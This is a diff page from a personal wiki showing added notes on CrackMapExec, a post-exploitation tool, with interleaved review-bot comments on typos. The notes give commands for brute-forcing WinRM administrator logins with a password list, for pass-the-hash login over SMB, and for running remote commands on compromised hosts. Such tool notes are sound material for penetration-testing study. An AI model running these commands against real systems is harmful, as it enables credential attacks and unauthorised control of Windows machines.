The gMan nixWiki

Because the mind is made of Teflon...

cme

Differences

cme [2024/02/04 01:58] gman | cme [2024/02/04 02:08] (current) – [CME & WinRM] gman
Line 4: Line 4:
   * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.    * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. 
   * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.   * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
 +  * See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
  
 **Supported Protocols:** WinRM, MSSQL, SMB, SSH **Supported Protocols:** WinRM, MSSQL, SMB, SSH
  
-For help and syntax, just issue the command: crackmapexec+For help and syntax, just issue the command: ''crackmapexec'' or...
  
-<code> +<code>
 crackmapexec -h crackmapexec -h
 crackmapexec winrm -h # (for help specific to the winrm protocol) crackmapexec winrm -h # (for help specific to the winrm protocol)
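Review bot: "it's functionality" in the second bullet (unchanged on both sides of this hunk) should be "its"; the apostrophe form is the contraction of "it is". Since the documentation link now sits in this introductory list, the new bullet is the right place for it, but it would read better as "See the documentation for further help and examples" so it matches the tone of the two bullets above it.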
Line 15: Line 16:
 </code> </code>
  
-**General Syntax:** ''crackmapexec <protocol> <target(s)> -u username -p password'' +**General Syntax:**
-  * Examples: +
-    * ''crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'''    or... +
-    * ''crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@''' +
-• See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.+
  
 +<code>
 +crackmapexec <protocol> <target(s)> -u username -p password
 +</code>
 +
 +**Examples:**
 +
 +<code>
 +crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or...
 +crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
 +</code>
 +
 +===== CME & WinRM =====
 +
 +**Syntax:**
 +
 +<code>
 +crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
 +</code>
 +
 +You can use the ''-u'' switch to specify a file of possible user names to try.
 +  * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first).
 +  * You should get a green "**[+]**" if successful.
 +
 +Look over the output (from the top down): 
 +  * First line: you can see it actually connects to WinRM.
 +  * NOTE: wsman is an implementation of WinRM: windows management.
 +
 +**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
 +
 +<code>
 +crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
 +crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
 +</code>
 +
 +You should get some happy feedback along with the results of your command execution.
 +  * ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.
 +
 +===== CME & Pass-the-Hash =====
 +
 +<code>
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
 +</code>
 +
 +This should indicated whether or not it works. 
 +  * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system...
 +
 +<code>
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
 +</code> 
 +
 +It should give you visual feedback about the command execution. And there you go. Execute what you want.
 +
 +
 +
 +
 +----
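Review bot: the first Execute Commands example, `crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"`, is missing the space before `-x`; as written the `-x` text is glued onto the password argument and `"whoami"` is left over as an unrecognised positional argument, so it should read `-p [password] -x "whoami"` exactly like the `systeminfo` line beneath it. The WinRM syntax block also pairs a single username with a password file while the sentence under it says `-u` is the switch that takes a file of user names; CME accepts either a single value or a file path for both `-u` and `-p`, so saying that for both switches would make the example and the explanation agree. Two smaller wording points: "you can crackmapexec to execute" is missing "use", and "This should indicated" should be "This should indicate".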
  
cme.1707011904.txt.gz · Last modified: by gman